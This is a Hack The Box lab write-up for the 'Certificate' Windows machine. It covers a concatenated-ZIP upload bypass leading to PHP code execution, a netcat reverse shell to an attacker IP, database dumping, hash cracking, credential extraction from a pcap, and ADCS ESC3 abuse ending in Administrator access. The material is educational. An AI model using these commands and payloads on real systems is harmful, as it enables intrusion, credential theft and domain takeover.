Hack The Box / WINDOWS / 2025-06-07
Hack The Box — Certificate (Windows)
Bypass file-upload filtering with concatenated ZIP polyglot to gain PHP RCE, extract webapp credentials and crack domain user hashes, then abuse ADCS ESC3 to impersonate DC01$ and compromise Administrator.
Target
- IP:
10.10.11.71
Recon
sudo nmap -sC -sV 10.10.11.71 -p- -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-title: Did not follow redirect to http://certificate.htb/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-02 21:45:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after: 2025-11-04T03:14:54
| MD5: 0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
|_ssl-date: 2025-06-02T21:46:38+00:00; +8h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after: 2025-11-04T03:14:54
| MD5: 0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
|_ssl-date: 2025-06-02T21:46:38+00:00; +8h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-02T21:46:38+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after: 2025-11-04T03:14:54
| MD5: 0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-02T21:46:38+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after: 2025-11-04T03:14:54
| MD5: 0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49723/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Add certificate.htb and dc01.certificate.htb to /etc/hosts.
Go to http://certificate.htb/.
It is a PHP website.
curl -v http://certificate.htb/
Server header says: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30.
Register with any user and log in.
Go to courses.php, choose a random course, click enroll. Quizzes appear below.
Click a quiz.
There is an upload form saying:
Please select the assignment file you want to upload (the file will be reviewed by the course instructor)
We accept only the following file types: .pdf .docx .pptx .xlsx
You include the assignment file in .zip archive file to reduce it's size
By testing:
- It accepts direct
.pdf,.docx,.pptxuploads, not.xlsx - It accepts a
.zipcontaining a single file, and that file must have extension.pdf,.docx, or.pptx
By interacting with this form:
- If we upload
.pdf,.docx, or.pptx, the file goes touploads/<some_hash>/<filename> - If we upload a zip, it extracts and uploads the file inside that folder
- If we upload a zip with more than one file, files are not uploaded and server returns an empty response
I tried several attacks. Zip Slip does not work.
Interesting behavior: if we upload a file named for example test.php:test.pdf, an empty file test.php is created.
This is because Windows supports Alternate Data Streams (ADS).
Useful link:
- https://blog.netwrix.com/2022/12/16/alternate_data_stream/
However, with this trick we only create an empty .php file, so it is not enough.
Finally, the working attack is what we can call zip concatenation, which consists of creating a zip file by concatenating two zip files.
In this case, some programs/libraries behave differently: some process only the first zip and some only the second.
Useful link:
- https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/
Attack idea in this case:
- one zip with a
.pdffile (allowed extension) so validation passes - one zip with a
.phpfile; validation ignores this one, but extraction processes it
We can create the zip with this bash script (also saved as attachments/gen_zip.sh):
#!/bin/bash
rm a.zip tmp1.zip tmp2.zip
echo 'first' > first.pdf
echo '<?php phpinfo(); ?>' > second.php
zip tmp1.zip first.pdf
zip tmp2.zip second.php
cat tmp1.zip tmp2.zip > a.zip
Run the script.
We get a.zip.
Upload this zip.
The site shows something like:
File uploaded successfully!. You can check your uploaded assignment file(in case you want to re-upload it or do some changes) HERE
Where HERE is a link such as:
http://certificate.htb/static/uploads/104b78fcf316857f7d1c1b58a30c3e4c/first.pdf
If we visit that link, we get 404, so first.pdf was not uploaded.
But if we visit:
http://certificate.htb/static/uploads/104b78fcf316857f7d1c1b58a30c3e4c/second.php
we see second.php was uploaded, and we get the full phpinfo() output.
Now we can test RCE.
Put system("whoami") in second.php, recreate zip, upload again, and visit second.php.
We get:
certificate\xamppuser
Now get a reverse shell.
Go to revshells.com.
Generate a base64 PowerShell reverse shell.
Put payload in system() in PHP.
Listen with netcat:
rlwrap nc -vlnp 4444
Repeat upload procedure, visit second.php, and we get a reverse shell.
In this reverse shell we do not see errors, so we get a better shell using nc64.exe.
Download it:
wget https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
Start Python HTTP server and netcat listener:
python3 -m http.server 8000
rlwrap nc -vlnp 4444
On target machine, run:
cd C:\xampp\htdocs
curl http://10.10.14.157:8000/nc64.exe -o nc64.exe
.\nc64.exe -e cmd.exe 10.10.14.157 4444
We get a reverse shell.
Switch to PowerShell:
powershell
cd C:\xampp\htdocs\certificate.htb
type db.php
We notice:
try {
$dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
$db_user = 'certificate_webapp_user'; // Change to your DB username
$db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
];
$pdo = new PDO($dsn, $db_user, $db_passwd, $options);
We have a password.
MySQL is exposed only on localhost, so to access it we try chisel.
Download chisel for Linux and Windows: - https://github.com/jpillora/chisel
Upload Windows chisel to target machine.
On attacker machine:
./chisel_linux server --reverse --port 5555
On target machine:
.\chisel_windows.exe client http://10.10.14.157:5555 R:3306
Bad news: antivirus is active and blocks chisel execution as malware.
Try to check AV exclusions:
Get-WinEvent -LogName 'Microsoft-Windows-Windows Defender/Operational' -FilterXPath "*[System[(Event-ID=5007)]]" | Where-Object { $_.Message -like "*exclusion*" } | Select-Object Message | FL
We do not have permissions to read logs.
Actually, to retrieve all user data we can use a PHP script that dumps the users table from the DB.
In db.php there is DB connection code.
In login.php the users table is indicated.
We can use this script:
<?php
// Database connection using PDO
try {
$dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
$db_user = 'certificate_webapp_user'; // Change to your DB username
$db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
];
$pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
die('Database connection failed: ' . $e->getMessage());
}
$stmt = $pdo->prepare('SELECT * FROM Users');
$stmt->execute();
// Fetch and display results
$users = $stmt->fetchAll();
echo "<pre>";
foreach ($users as $user) {
print_r($user);
}
echo "</pre>";
?>
Put this into second.php.
Repeat previous upload procedure and visit second.php.
We get user data.
In particular, the usernames and passwords of interest are:
Lorra.AAA:$2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG
Sara1200:$2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK
Johney:$2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq
havokww:$2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti
stev:$2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2
sara.b:$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6
Try cracking.
Put those lines in hash.
./hashcat-6.2.6/hashcat.bin -a 0 -m 3200 ./hash ./rockyou.txt --username
./hashcat-6.2.6/hashcat.bin -a 0 -m 3200 ./hash ./rockyou.txt --username --show
We get:
sara.b:$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6:Blink182
In C:\Users there are these folders:
d----- 12/30/2024 8:33 PM Administrator
d----- 11/23/2024 6:59 PM akeder.kh
d----- 11/4/2024 12:55 AM Lion.SK
d-r--- 11/3/2024 1:05 AM Public
d----- 11/3/2024 7:26 PM Ryan.K
d----- 11/26/2024 4:12 PM Sara.B
d----- 12/29/2024 5:30 PM xamppuser
It seems we got Sara's password.
nxc smb dc01.certificate.htb -u 'Sara.B' -p 'Blink182'
SMB 10.10.11.71 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.71 445 DC01 [+] certificate.htb\Sara.B:Blink182
It works.
Get shares:
nxc smb dc01.certificate.htb -u 'Sara.B' -p 'Blink182' --shares
SMB 10.10.11.71 445 DC01 Share Permissions Remark
SMB 10.10.11.71 445 DC01 ----- ----------- ------
SMB 10.10.11.71 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.71 445 DC01 C$ Default share
SMB 10.10.11.71 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.71 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.71 445 DC01 SYSVOL READ Logon server share
Nothing interesting there.
evil-winrm -i dc01.certificate.htb -u 'Sara.B' -p 'Blink182'
We get a PowerShell shell as Sara.B.
ldapdomaindump certificate.htb -u 'certificate.htb\Sara.B' -p 'Blink182'
In domain_computers.json we notice:
CN SAM Name DNS Hostname Operating System Service Pack OS Version lastLogon Flags Created on SID description
WS-05 WS-05$ WS-05.certificate.htb Windows Server 2019 Standard Evaluation 10.0 (17763) 12/31/24 02:16:57 WORKSTATION_ACCOUNT 12/30/24 21:29:46 1131
WS-01 WS-01$ WS-01.certificate.htb Windows Server 2019 Standard Evaluation 10.0 (17763) 11/27/24 06:11:39 WORKSTATION_ACCOUNT 11/03/24 22:49:39 1103
DC01 DC01$ DC01.certificate.htb Windows Server 2019 Datacenter 10.0 (17763) 06/08/25 17:52:04 SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION 11/03/24 09:24:32 1000
So besides the DC there are two other computers.
Get list of users:
nxc smb dc01.certificate.htb -d certificate.htb -u 'Sara.B' -p 'Blink182' --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users_2.txt
bloodhound-python -u 'Sara.B' -p 'Blink182' -ns 10.10.11.71 -d 'certificate.htb' -dc dc01.certificate.htb -c All --zip
We get a zip.
sudo bloodhound
Upload the zip.
Back to Sara.B Evil-WinRM shell:
cd C:\Users\Sara.B\Documents
ls
We notice folder WS-01.
cd WS-01
ls
-a---- 11/4/2024 12:44 AM 530 Description.txt
-a---- 11/4/2024 12:45 AM 296660 WS-01_PktMon.pcap
type Description.txt
The workstation 01 is not able to open the "Reports" smb shared folder which is hosted on DC01.
When a user tries to input bad credentials, it returns bad credentials error.
But when a user provides valid credentials the file explorer freezes and then crashes!
We want to download the pcap.
Use smbserver.
On attacker machine:
smbserver.py -smb2support -username test12 -password test12 share $(pwd)
On target machine:
net use \\10.10.14.157\share test12 /USER:test12
cp WS-01_PktMon.pcap \\10.10.14.157\share
Open the pcap in Wireshark.
Download PCredz:
- https://github.com/lgandx/PCredz
python3 ./Pcredz -f ../WS-01_PktMon.pcap
Pcredz 2.0.2
Author: Laurent Gaffie <lgaffie@secorizon.com>
This script will extract NTLM (HTTP,LDAP,SMB,MSSQL,RPC, etc), Kerberos,
FTP, HTTP Basic and credit card data from a given pcap file or from a live interface.
CC number scanning activated
Unknown format, trying TCPDump format
protocol: tcp 192.168.56.128:49712 > 192.168.56.101:445
NTLMv2 complete hash is: Administrator::WS-01:0f18018782d74f81:3FF29BA4B51E86ED1065C438B6713F28:01010000000000000588E3DA922EDB012A49D5AAA4EEEA0C00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008000588E3DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
../WS-01_PktMon.pcap parsed in: 0.0959 seconds (File size 0.283 Mo).
It does not crack.
Useful site:
- https://notes.benheater.com/books/active-directory/page/extracting-secrets-from-pcaps
sudo apt install mono-devel
Download NetworkMiner and extract it:
- https://www.netresec.com/?page=NetworkMiner
mono NetworkMiner.exe
We cannot open WS-01_PktMon.pcap directly because it is in pcapng format, and analyzing it requires the professional version of NetworkMiner.
But we can convert pcapng to pcap.
cp WS-01_PktMon.pcap.original WS-01_PktMon.pcapng
editcap -F libpcap WS-01_PktMon.pcapng output.pcap
Now NetworkMiner can open the pcap.
Go to the credentials tab.
There are two krb5pa credentials for user Lion.SK.
Take the first one.
Right click --> copy password.
Put it in file hash.
Use John the Ripper to crack it:
./john/run/john --wordlist=rockyou.txt ./hash
We get password:
!QAZ2wsx
From BloodHound we see Sara.B is in group Account Operators, which has many GenericAll relations toward groups and users, including Lion.SK.
Download repository:
- https://github.com/CravateRouge/bloodyAD.git
python3 bloodyAD/bloodyAD.py --host 'dc01.certificate.htb' -d certificate.htb --dc-ip 10.10.11.71 -u 'Sara.B' -p 'Blink182' set password 'Lion.SK' '!Kali12345678!'
[+] Password changed successfully!
evil-winrm -i dc01.certificate.htb -u 'Lion.SK' -p '!Kali12345678!'
We get a PowerShell shell as Lion.SK.
We can retrieve the user flag.
certipy find -dc-ip 10.10.11.71 -u Lion.SK -p '!Kali12345678!' -target certificate.htb -text -stdout -vulnerable
Certificate Authorities
0
CA Name : Certificate-LTD-CA
DNS Name : DC01.certificate.htb
Certificate Subject : CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Serial Number : 75B2F4BBF31F108945147B466131BDCA
Certificate Validity Start : 2024-11-03 22:55:09+00:00
Certificate Validity End : 2034-11-03 23:05:09+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : CERTIFICATE.HTB\Administrators
Access Rights
ManageCa : CERTIFICATE.HTB\Administrators
CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
ManageCertificates : CERTIFICATE.HTB\Administrators
CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Enroll : CERTIFICATE.HTB\Authenticated Users
Certificate Templates
0
Template Name : Delegated-CRA
Display Name : Delegated-CRA
Certificate Authorities : Certificate-LTD-CA
Enabled : True
Client Authentication : False
Enrollment Agent : True
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
SubjectAltRequireEmail
SubjectRequireEmail
SubjectRequireDirectoryPath
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
AutoEnrollment
Private Key Flag : ExportableKey
Extended Key Usage : Certificate Request Agent
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-05T19:52:09+00:00
Template Last Modified : 2024-11-05T19:52:10+00:00
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFICATE.HTB\Domain CRA Managers
CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Object Control Permissions
Owner : CERTIFICATE.HTB\Administrator
Full Control Principals : CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Write Owner Principals : CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Write Dacl Principals : CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Write Property Enroll : CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
[+] User Enrollable Principals : CERTIFICATE.HTB\Domain CRA Managers
[!] Vulnerabilities
ESC3 : Template has Certificate Request Agent EKU set.
ESC3 attack is possible.
Useful site:
- https://www.rbtsec.com/blog/active-directory-certificate-services-adcs-esc3/
Users in Domain CRA Managers can enroll in template Delegated-CRA.
From BloodHound we see Lion.SK is in Domain CRA Managers.
Most ESC3 writeups eventually use template User.
certipy find -dc-ip 10.10.11.71 -u Lion.SK -p '!Kali12345678!' -target certificate.htb -text
This shows the various templates.
We notice User template is not enabled. But template Machine is enabled.
In particular, Machine allows client authentication and Domain Computers can enroll, so WS-01$ and WS-05$ can enroll.
From BloodHound we see Sara.B has GenericAll over WS-01$, WS-05$, and Domain CRA Managers.
Attack idea:
- add a machine account (for example
WS-01$) toDomain CRA Managers - change machine account password
- perform ESC3
python3 bloodyAD/bloodyAD.py --host 'dc01.certificate.htb' -d certificate.htb --dc-ip 10.10.11.71 -u 'Sara.B' -p 'Blink182' add groupMember 'Domain CRA Managers' 'WS-01$'
[+] WS-01$ added to Domain CRA Managers
python3 bloodyAD/bloodyAD.py --host 'dc01.certificate.htb' -d certificate.htb --dc-ip 10.10.11.71 -u 'Sara.B' -p 'Blink182' set password 'WS-01$' '!Kali12345678!'
[+] Password changed successfully!
We also have to set the email of WS-01$.
python3 bloodyAD/bloodyAD.py --host 'dc01.certificate.htb' -d certificate.htb --dc-ip 10.10.11.71 -u 'Sara.B' -p 'Blink182' set object 'WS-01$' mail -v 'WS-01$@certificate.htb'
[+] WS-01$'s mail has been updated
Now we can request the certificate:
certipy req -ca Certificate-LTD-CA -dc-ip 10.10.11.71 -u 'WS-01$@certificate.htb' -p '!Kali12345678!' -template Delegated-CRA -target dc01.certificate.htb
[*] Saving certificate and private key to 'ws-01.pfx'
[*] Wrote certificate and private key to 'ws-01.pfx'
If we try requesting a certificate on-behalf-of Administrator, we get:
[-] Got error while requesting certificate: code: 0x8009480f - CERTSRV_E_SUBJECT_DNS_REQUIRED - The Domain Name System (DNS) name is unavailable and cannot be added to the Subject Alternate name.
This is because the certificate requires a dNSHostName, but users cannot have one; only machine accounts can.
So this means we can request a certificate on-behalf-of machine account DC-01$.
Request certificate for DC-01$:
certipy req -ca Certificate-LTD-CA -dc-ip 10.10.11.71 -u 'WS-01$@certificate.htb' -p '!Kali12345678!' -template Machine -dns 'DC01.certificate.htb' -target dc01.certificate.htb -on-behalf-of 'CERTIFICATE\DC01$' -pfx ws-01.pfx
certipy auth -dc-ip 10.10.11.71 -pfx dc01.pfx
[*] Saving credential cache to 'dc01.ccache'
[*] Wrote credential cache to 'dc01.ccache'
[*] Trying to retrieve NT hash for 'dc01$'
[*] Got hash for 'dc01$@certificate.htb': aad3b435b51404eeaad3b435b51404ee:f36e0bc3c9a34c3acdb8b79df54f27cd
export KRB5CCNAME=dc01.ccache
nxc smb dc01.certificate.htb -k --use-kcache
SMB dc01.certificate.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False)
SMB dc01.certificate.htb 445 DC01 [+] certificate.htb\dc01$ from ccache
secretsdump.py -k -no-pass dc01.certificate.htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6:::
evil-winrm -i dc01.certificate.htb -u Administrator -H d804304519bf0143c14cbf1c024408c6
We get a PowerShell shell as Administrator.
We can retrieve the root flag.